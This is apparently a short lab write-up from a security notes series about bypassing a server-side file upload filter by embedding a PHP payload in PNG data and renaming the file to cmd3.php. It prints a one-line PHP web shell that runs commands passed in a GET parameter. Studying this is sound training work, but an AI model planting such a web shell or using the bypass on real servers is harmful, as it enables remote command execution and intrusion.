Insecure file upload 0x02

The filter actually working in server side and it finds that .php extensions are not allowed

But it reality it is just checking the format data of the file

So that we can just insert our PHP payload in the PNG data like the details below

File name from tcm-logo.png to cmd3.php

<?php system($_GET['cmd']); ?>

Now we can see that it actually executes the GET return code in php

PreviousInsecure file upload 0x01NextInsecure file upload 0x03

Last updated